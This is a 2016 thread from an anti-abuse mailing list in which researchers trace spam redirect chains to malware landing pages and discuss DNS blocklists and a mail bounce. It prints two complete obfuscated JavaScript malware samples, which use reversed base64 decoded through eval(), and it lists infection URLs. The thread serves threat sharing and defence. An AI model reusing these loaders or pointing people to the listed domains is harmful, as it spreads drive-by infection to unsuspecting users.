Re: [anti-abuse-wg] Malware/ransomware current live distribution IPs
andre@ox.co.za you wrote:
If you would like to add superblock.ascams.com - these seem like good links:
Exim : http://www.exim.org/howto/rbl.html postfix :https://www.howtoforge.com/block_spam_at_mta_level_postfix
Note: The specific domains and IPs I have just posted are pointless to block in mail server configs, because the final "landing page" domains that are actually spreading the infectious agents are never seen, and will never be seen in e-mails. Rather, there _is_ spam... lots of it... trying to get people to go to these infection domains, but only via a sequence of one or two redirections (through other domains) first. Regards, rfg
In message <15295.1467317095@server1.tristatelogic.com>, I wrote:
andre@ox.co.za you wrote:
If you would like to add superblock.ascams.com - these seem like good links:
Exim : http://www.exim.org/howto/rbl.html postfix :https://www.howtoforge.com/block_spam_at_mta_level_postfix
Note: The specific domains and IPs I have just posted are pointless to block in mail server configs, because the final "landing page" domains that are actually spreading the infectious agents are never seen, and will never be seen in e-mails. Rather, there _is_ spam... lots of it... trying to get people to go to these infection domains, but only via a sequence of one or two redirections (through other domains) first.
Conveniently, to further this point, these same spammers just sent me ANOTHER one of their standard spams. ** WARNING ** Browsing to the URL below may result in infection! Spam body/payload: ============================================================================= Hello, Here is some information that inspired me a lot, read it please, it may be helpful <http://xishentothi.politicalresumes.com/xyrzxk> Yours faithfully, fistvani@andrew.cmu.edu Hello, Here is some information that inspired me a lot, read it please, it may be helpful [1]http://xishentothi.politicalresumes.com/xyrzxk Yours faithfully, fistvani@andrew.cmu.edu References 1. http://xishentothi.politicalresumes.com/xyrzxk ============================================================================= Please note that actually, the domain "politicalresumes.com" does not... except in a very limited sense... "belong" to the spammer(s). Rather, as has been reported by (I believe) Cisco/Talos, the actual owner of this domain has simply been infected, and whatever credentials he uses to control/manipulate the DNS for his domain have been absconded with by the spammer(s). They in turn have *added* several new subdomains to this base domain name. These currently include, at the very least: fekudamo.politicalresumes.com lardipruto.politicalresumes.com rdostapidy.politicalresumes.com wongakyma.politicalresumes.com xishentothi.politicalresumes.com Anyway, following the link in the above spam payload/body gets you to a trivial redirector... kindly hosted by Godaddy... which then attempts to take you to this new URL: http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33 There is another redirection once you get there. When you get to the final landing page, that's the one where you get infected with/by Javascript malware. Regards, rfg
In message <15749.1467320923@server1.tristatelogic.com>, I wrote:
Anyway, following the link in the above spam payload/body gets you to a trivial redirector... kindly hosted by Godaddy... which then attempts to take you to this new URL:
http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33
There is another redirection once you get there.
The additional redirection takes you to: http://372-beauty.gooodweightlossgood.com/us/newd/scux/cla-safflower-oil/ Note however that the content being served up here is *only* an advert for a useless diet supplement (CLA Safflower Oil)... *not* a hunk of Javascript malware. I have yet to figure this out exactly. Some of the time, these sites serve up unambiguous (and heavily encoded) Javascript malware. (See below.) Other times, they don't. I confess that I haven't figured out the pattern yet, or even whether it is a time-dependent thing. Regards, rfg malware sample 1: ============================================================================== <!DOCTYPE html> <html> <head> <script language="javascript" type="text/javascript"> var _1Ol='==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';function _0l0(data){var OOIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=OOIlOI.indexOf(data.charAt(i++));h2=OOIlOI.indexOf(data.charAt(i++));h3=OOIlOI.indexOf(data.charAt(i++));h4=OOIlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function OOI(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(_0l0(OOI(_1Ol))); </script> </head> <body> </body> </html> ============================================================================== Malware sample 2: ============================================================================== <!DOCTYPE html> <html> <head> <script language="javascript" type="text/javascript"> var I1O='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';function OlI(data){var _011lOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i =0,enc='';do{h1=_011lOI.indexOf(data.charAt(i++));h2=_011lOI.indexOf(data.charAt(i++));h3=_011lOI.indexOf(data.charAt(i++));h4=_011lOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function _011(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(OlI(_011(I1O))); </script> </head> <body> </body> </html> ==============================================================================
On Thu, 30 Jun 2016 14:08:43 -0700 "Ronald F. Guilmette" <rfg@tristatelogic.com> wrote:
In message <15295.1467317095@server1.tristatelogic.com>, I wrote:
If you would like to add superblock.ascams.com - these seem like good links:
Exim : http://www.exim.org/howto/rbl.html postfix :https://www.howtoforge.com/block_spam_at_mta_level_postfix Note: The specific domains and IPs I have just posted are pointless to block in mail server configs, because the final "landing page" domains that are actually spreading the infectious agents are never seen, and will never be seen in e-mails. Rather, there _is_ spam... lots of it... trying to get people to go to these infection domains, but only via a sequence of one or two redirections (through other domains) first. Conveniently, to further this point, these same spammers just sent me ANOTHER one of their standard spams. ** WARNING ** Browsing to the URL below may result in infection!
on the dnsbl - superblock.ascams.com it is all mixed - as abuse, as the same resources in the same ip's and subnets are re-purposed every now and then...even the bot controllers and the bots themselves are listed together, currently on spamid.net - I still need to setup seperate dnsbl for bots, controllers, etc. So, where you are now getting your payloads may be used for something else tomorrow... You will find though, that the superblock.ascams.com list will reduce your incoming spam by quite a lot? - you can tell me the percentage? Regards Andre
On Fri, 1 Jul 2016 06:22:08 +0200 andre@ox.co.za wrote:
on the dnsbl - superblock.ascams.com it is all mixed - as abuse, as the same resources in the same ip's and subnets are re-purposed every now and then...even the bot controllers and the bots themselves are listed together, currently on spamid.net - I still need to setup seperate dnsbl for bots, controllers, etc.
So, where you are now getting your payloads may be used for something else tomorrow... You will find though, that the superblock.ascams.com list will reduce your incoming spam by quite a lot? - you can tell me the percentage?
So, I reply to you and list - email to you is bouncing... on a good reputation ipv4? Ronald, this must be impacting your email quite a lot? It is a ipv6 bouce (dnswl) on an ipv4 number... but it does not tell the recipient how to list/delist... rfg@tristatelogic.com host server1.tristatelogic.com [69.62.255.118] SMTP error from remote mail server after RCPT TO:<rfg@tristatelogic.com>: 550 5.7.1 Service unavailable; Unverified Client host [hostacc.com] blocked using black.uribl.com; 127.0.0.1 -> Query Refused. See http://uribl.com/refused.shtml for more information [Your DNS IP: 74.125.80.70] go read the rfc bits, at the bottom, here: http://spamid.net/?spam=definitions this "bounce" does not tell the sender how to delist from "black.uribl.com" etc. or to list - if it is a white list, etc. etc Andre
participants (2)
-
andre@ox.co.za -
Ronald F. Guilmette